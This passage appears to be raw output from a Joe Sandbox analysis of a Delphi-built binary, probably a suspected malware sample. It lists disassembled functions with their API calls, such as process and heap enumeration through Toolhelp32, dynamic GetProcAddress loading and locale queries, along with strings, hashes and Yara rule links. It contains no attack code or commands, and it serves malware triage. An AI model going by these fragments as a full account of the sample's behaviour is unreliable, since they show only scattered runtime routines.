                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                              • API String ID: 667068680-597814768
                                                                                              • Opcode ID: d40ed4ac023aece0ea9db96c7bd963d7943383e5096ba0f001e3065007c896c2
                                                                                              • Instruction ID: 4581db43a8528f3e0915f044fd091391edbdaa04e379840f5e9786fa2bc20aca
                                                                                              • Opcode Fuzzy Hash: d40ed4ac023aece0ea9db96c7bd963d7943383e5096ba0f001e3065007c896c2
                                                                                              • Instruction Fuzzy Hash: 723191B8A507E09FDF10EFBCE889A5D37A8EF2F6127144965A830DF209E774A440CB51
                                                                                              Function 031C5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5925
                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 031C593C
                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 031C596C
                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C59D0
                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A06
                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A19
                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A2B
                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A37
                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000), ref: 031C5A6B
                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C), ref: 031C5A77
                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 031C5A99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                              • API String ID: 3245196872-1565342463
                                                                                              • Opcode ID: 8e141d023f5d83a07a606f8197fa898e0e9c3664ec427503bd647066273d8852
                                                                                              • Instruction ID: 4c998f541705e1a4b57e65fe85c72cc2e927007eb60f3183988effd333d34006
                                                                                              • Opcode Fuzzy Hash: 8e141d023f5d83a07a606f8197fa898e0e9c3664ec427503bd647066273d8852
                                                                                              • Instruction Fuzzy Hash: 2F418E79D50299AFDB20DAE9CC88ADEB3BDAF1D240F1445E9E144EB241E770EE408B50
                                                                                              Function 031C5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031C5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 031C5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 031C5BFB
                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 031C5C26
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5C6D
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5C7D
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5CA5
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5CB5
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 031C5CDB
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 031C5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                              • API String ID: 1599918012-2375825460
                                                                                              • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                              • Instruction ID: dcfe56af66f05711fa1c65d2fa42a256f0bb1801d0396704d0700874af3356c0
                                                                                              • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                              • Instruction Fuzzy Hash: 4631A475E502AC3BEB25D6B48C85BDEB7AD9B1D380F1402F99604E6081D774EE888B54
                                                                                              Function 031C7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 031C7FF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1705453755-0
                                                                                              • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                              • Instruction ID: 8e38d4e0ecc86bacb0c308a77a9461f20c7484a0ce824a4f3f7a7a3738241ad0
                                                                                              • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                              • Instruction Fuzzy Hash: 151100B5A00209AF9B00CF99C881DAFF7F9FFCD300B14C559A414EB250E671AA01CB90
                                                                                              Function 031CA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                              • Instruction ID: da33b0a759cf9b83adfa4d550ec06157ed20eabb5003832d5537cd57e20033a7
                                                                                              • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                              • Instruction Fuzzy Hash: 18E0D87572435817D316E55D9C80EFA725CAB6C610F00427EBD05CB385EFF19E8046E8
                                                                                              Function 031CB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32(?,031ED106,00000000,031ED11E), ref: 031CB79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 1edb9d1cd1876dce230502a44d67f8269d1321a30f3d86a91dad482e1a9c7364
                                                                                              • Instruction ID: 9cf2ca581c85b1ee0e0cc90ed55b3d2bc1f3326c8dbb79584cc81e24cfa0fe43
                                                                                              • Opcode Fuzzy Hash: 1edb9d1cd1876dce230502a44d67f8269d1321a30f3d86a91dad482e1a9c7364
                                                                                              • Instruction Fuzzy Hash: B6F017789183418FD348EF68D44161577E8FB5C600F04892CE898CB388E7369494DBB2
                                                                                              Function 031CA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,031CBE72,00000000,031CC08B,?,?,00000000,00000000), ref: 031CA823
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                              • Instruction ID: d68044233d66bdc905ea93cfadf816996a074cd0f2ccce30db3a596bd3d7de86
                                                                                              • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                              • Instruction Fuzzy Hash: 0DD05EA631E2A42BA215D15A2D84D7B5ADCDED9AA2F04403EB988CA111D310CC07D671
                                                                                              Function 031C920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 481472006-0
                                                                                              • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                              • Instruction ID: 0c979fdf733421107f31b663709d68e470cf4d18ff1feb824de92923a4e0bd3f
                                                                                              • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                              • Instruction Fuzzy Hash: EAA0124440497042854073180C0253430405C20920FC8874468F8442D0EA2D45208093
                                                                                              Function 031C20C4 Relevance: .1, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                              Function 031CD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 031CD29D
                                                                                                • Part of subcall function 031CD268: GetProcAddress.KERNEL32(00000000), ref: 031CD281
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                              • API String ID: 1646373207-1918263038
                                                                                              • Opcode ID: 8e33663388d31ef81cbae8aef5f224c0b9800d59c0a2cc8b6ff099485b969955
                                                                                              • Instruction ID: 2f7b2250d49163ad2232322bfed39d7a9717f9275d427e5f4e9fc7668560535a
                                                                                              • Opcode Fuzzy Hash: 8e33663388d31ef81cbae8aef5f224c0b9800d59c0a2cc8b6ff099485b969955
                                                                                              • Instruction Fuzzy Hash: 44415F696783CC5B9204FB6D7604426F7E9D66DA143A0823EB424AB784DB30FC538669
                                                                                              Function 031D6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 031D6EDE
                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 031D6EEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 031D6EFF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 031D6F0F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 031D6F1F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 031D6F2F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 031D6F3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                              • API String ID: 667068680-2233174745
                                                                                              • Opcode ID: d44ac31da967b7d4833ba25c2eb9fdce15cf4a967d3179dea4632f5e956815a6
                                                                                              • Instruction ID: 0c098b713c96e9bbfe6d9f2808b293c921bfed7a356cb5ccf00df01ab651192a
                                                                                              • Opcode Fuzzy Hash: d44ac31da967b7d4833ba25c2eb9fdce15cf4a967d3179dea4632f5e956815a6
                                                                                              • Instruction Fuzzy Hash: 9CF0ACE46587D07FEA04FBB05C9186E2758A97D5053482C1DA8165D547E776A8408730
                                                                                              Function 031C2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 031C28CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                              • API String ID: 2030045667-32948583
                                                                                              • Opcode ID: 10ea347480903c10a3fc500986f11b984c729f95da482b55d67345060613237e
                                                                                              • Instruction ID: 51174c9435e9af95bb7adebaab9d56c17cda6b9f004092fbbe34ab5bf58d34c6
                                                                                              • Opcode Fuzzy Hash: 10ea347480903c10a3fc500986f11b984c729f95da482b55d67345060613237e
                                                                                              • Instruction Fuzzy Hash: 87A1C734A143E48FDF21EA2CCC84BD9B6E4EB2D650F1448E9D549AB242CF7589C7CB51
                                                                                              Function 031C252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • An unexpected memory leak has occurred. , xrefs: 031C2690
                                                                                              • The unexpected small block leaks are:, xrefs: 031C2707
                                                                                              • Unexpected Memory Leak, xrefs: 031C28C0
                                                                                              • , xrefs: 031C2814
                                                                                              • bytes: , xrefs: 031C275D
                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 031C2849
                                                                                              • 7, xrefs: 031C26A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                              • API String ID: 0-2723507874
                                                                                              • Opcode ID: 9a284a0fe48d95b5df20f711e9a8fdf1c61a430529b30f13b91a547df2338b17
                                                                                              • Instruction ID: 4c6f596c0cdaaabf0cac38ee9d5f295ecf64ff474ebd48d4804df7e31ddd38b8
                                                                                              • Opcode Fuzzy Hash: 9a284a0fe48d95b5df20f711e9a8fdf1c61a430529b30f13b91a547df2338b17
                                                                                              • Instruction Fuzzy Hash: D071A434A143E88FDF21EA2CCC84BD8BAF5EB2D600F1448E9D549AB241DF7589C6CB51
                                                                                              Function 031CBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,031CC08B,?,?,00000000,00000000), ref: 031CBDF6
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread
                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 4232894706-2493093252
                                                                                              • Opcode ID: c2473a18e5fa4faf934e0957ffae34228c55418f9e75be08d153c88f9b4d0d65
                                                                                              • Instruction ID: 328fbe105d9450832bc07295081b0c75dfb8c38b17c09837217ad0eb29548891
                                                                                              • Opcode Fuzzy Hash: c2473a18e5fa4faf934e0957ffae34228c55418f9e75be08d153c88f9b4d0d65
                                                                                              • Instruction Fuzzy Hash: D1615078B243CC9BCB06EBA5E85069E77B6AFAC700F50843DA101AF645CB35DD1A8791
                                                                                              Function 031DAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DB000
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 031DB017
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DB0AB
